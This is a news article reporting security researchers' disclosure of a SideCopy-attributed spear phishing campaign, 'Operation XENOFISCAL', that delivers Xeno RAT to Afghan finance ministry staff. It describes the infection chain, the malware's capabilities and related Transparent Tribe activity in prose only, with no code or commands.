Cybersecurity researchers have disclosed details of a targeted spear phishing campaign believed to be linked to the Pakistan aligned threat group SideCopy, targeting Afghanistan’s Ministry of Finance and related government institutions with an open source remote access trojan known as Xeno RAT. According to findings released by Seqrite Labs, the operation focused on government entities including provincial revenue and finance directorates, Pashto speaking officials, and employees working at the provincial level. Researchers tracking the activity have assigned the campaign the name Operation XENOFISCAL, identifying it as part of a broader pattern of cyber espionage activity affecting South Asian government organizations.
According to technical analysis published by Seqrite Labs researcher Dixit Panchal, the campaign begins with a spear phishing technique involving a ZIP archive that contains a malicious Windows Shortcut file, commonly referred to as an LNK file. The lure file reportedly carries a carefully designed Pashto language filename, a choice researchers believe reflects a deliberate attempt to align with Afghanistan’s government communication environment where Pashto remains one of the dominant languages. Security analysts noted that the use of a localized language demonstrates familiarity with the target ecosystem and increases the likelihood that recipients may interact with the malicious file. Researchers stated that the file executes through “mshta.exe” to retrieve a remote HTML Application from a compromised Afghan educational domain, eventually launching obfuscated JavaScript code directly in memory to avoid detection.
The attack chain reportedly establishes persistence on infected systems by creating Windows Registry entries designed to imitate Microsoft Edge while simultaneously deploying Xeno RAT version 1.8.7 alongside a decoy document intended to distract victims. Security researchers explained that the malware is delivered through a DLL based loader, enabling attackers to maintain stealth while activating remote access capabilities. Once active, Xeno RAT connects to a remote command server over TCP, allowing threat actors to remotely issue instructions and control compromised systems. The malware is reportedly capable of executing external DLL modules, transferring files, launching itself through scheduled tasks, collecting antivirus details, supporting SOCKS5 proxy tunneling, logging keystrokes, monitoring clipboard activity, capturing screenshots, and accessing webcam and microphone functions. Researchers also noted that the malware can remove persistence mechanisms and uninstall itself to limit forensic traces if necessary.
Security analysts believe the latest campaign aligns with previous activity attributed to SideCopy, a threat actor associated with the broader Transparent Tribe, also known as APT36. The group has previously been linked to cyber operations involving several malware families used to collect sensitive information from compromised devices. In April 2025, researchers attributed a separate wave of attacks targeting organizations in India to SideCopy, involving malware such as Xeno RAT, Spark RAT, and CurlBack RAT. The disclosure also follows reports of another suspected Transparent Tribe campaign targeting Indian military infrastructure through weaponized Linux desktop files delivered using defense related contract lures and WhatsApp based social engineering. Researchers tracking that operation stated that the attack chain relied on staged payload delivery and deployment of a Golang based implant identified as DeskRAT, reinforcing concerns around the growing sophistication of cyber espionage campaigns targeting South Asian institutions.
Follow the SPIN IDG WhatsApp Channel for updates across the Smart Pakistan Insights Network covering all of Pakistan’s technology ecosystem.
